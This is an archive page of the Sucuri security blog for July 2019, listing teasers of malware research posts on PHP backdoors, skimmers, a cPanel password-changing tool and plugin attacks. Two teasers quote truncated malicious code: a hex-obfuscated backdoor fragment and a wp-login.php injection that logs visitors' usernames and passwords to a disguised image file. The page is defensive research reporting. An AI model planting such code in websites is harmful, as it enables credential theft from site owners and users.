• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login

Archives for July 2019

Labs Note

July 31, 2019Luke Leal

New variant of “trollherten” malware

We continue to see new variations of obfuscation used to hide a PHP backdoor that began to be heavily used by malicious users in late 2018 – as we mentioned in a blog post at the time. This variant tries to hide by compressing and…

Read More about New variant of “trollherten” malware

Labs Note

July 31, 2019Krasimir Konov

Self-destruct malware

The majority of malware we find on compromised websites have been planted by bad actors with the intention of concealing and accessing backdoor access. During a recent investigation, we found…

Read More about Self-destruct malware

Labs Note

July 30, 2019Luke Leal

Yet another variant of the cPanel user shadow editor malware

We have discovered a new variant of PHP malware used to edit a cPanel users’s shadow file, allowing for bad actors to change passwords for all of the email accounts…

Read More about Yet another variant of the cPanel user shadow editor malware

Reverse Hardening WP Config

July 30, 2019Luke Leal

Reverse Hardening WordPress Config

Hardening is the process of securing a website or system against known security weaknesses or potential issues to reduce the attack surface. The more functions or features a website has,…

Read More about Reverse Hardening WordPress Config

Labs Note

July 29, 2019John Castro

Plugins Under Attack: July 2019

A long-lasting malware campaign targeting deprecated, vulnerable versions of plugins continues to be leveraged by attackers to inject malicious scripts into affected websites: Multi-Vector Attack in Server Logs: March 2019…

Read More about Plugins Under Attack: July 2019

How to Stop a DDoS Attack & Prevent Future Attacks

July 29, 2019Victor Santoyo

How to Stop a DDoS Attack

Editorial: This post was last updated October 11th, 2022. DDoS attacks are a growing threat for websites. But do you know how to stop them in their tracks? We’ll cover…

Read More about How to Stop a DDoS Attack

Labs Note

July 29, 2019Luke Leal

Simple but effective backdoor

We recently found a malicious PHP file containing a small amount of code that is effective at hiding from detection by various server side scanning tools. $a = “\x66\x69\x6c\x65\x5f\x67\x65\x74\x5f\x63\x6f\x6e\x74\x65\x6e\x74\x73”; $b…

Read More about Simple but effective backdoor

Labs Note

July 28, 2019Luke Leal

Simple WP login stealer

We recently found the following malicious code injected into wp-login.php on multiple compromised websites. \ } // End of login_header() $username_password=$_POST[‘log’].”—-xxxxx—-“.$_POST[‘pwd’].”ip:”.$_SERVER[‘REMOTE_ADDR’].$time = time().”\r\n”; $hellowp=fopen(‘./wp-content/uploads/2018/07/[redacted].jpg’,’a+’); $write=fwrite($hellowp,$username_password,$time); /** Code injection in wp-login.php…

Read More about Simple WP login stealer

Labs Note

July 27, 2019Luke Leal

“Loader for Secured Files” and arrayed b374k shell encoding

This file (33×77.php) was detected in the document root of a website during a website cleanup for a client. It demonstrates how hackers sometimes use comments or other text within…

Read More about “Loader for Secured Files” and arrayed b374k shell encoding

Labs Note

July 25, 2019Luke Leal

Spam Doorway Manager

While investigating a client’s compromised website, we saw a malicious file that was being used to manage an existing SEO spam doorway. We usually refer to these types of files…

Read More about Spam Doorway Manager

July 25, 2019Luke Leal

Fake Google Domains Used in Evasive Magento Skimmer

We were recently contacted by a Magento website owner who had been blacklisted and was experiencing McAfee SiteAdvisor “Dangerous Site” warnings. Our investigation revealed that the site had been infected…

Read More about Fake Google Domains Used in Evasive Magento Skimmer

Primary Sidebar

Socialize With Sucuri

We're actively engaged across multiple platforms. Follow us and let's connect!

  • Facebook
  • Twitter
  • LinkedIn
  • YouTube
  • Instagram
  • RSS Feed

Join Over 20,000 Subscribers!

Footer

Products

  • Website Firewall
  • Website AntiVirus
  • Website Backups
  • WordPress Security
  • Enterprise Services

Solutions

  • DDos Protection
  • Malware Detection
  • Malware Removal
  • Malware Prevention
  • Blacklist Removal

Support

  • Blog
  • Knowledge Base
  • SiteCheck
  • Research Labs
  • FAQ

Company

  • About
  • Media
  • Events
  • Employment
  • Contact
  • Testimonials
  • Facebook
  • Twitter
  • LinkedIn
  • Instagram

Customer Login

Sucuri Home

  • Terms of Use
  • Privacy Policy
  • Frequently Asked Questions

© 2022 Sucuri Inc. All rights reserved

Sucuri Cookie Policy
See our policy>>

Our website uses cookies, which help us to improve our site and enables us to deliver the best possible service and customer experience.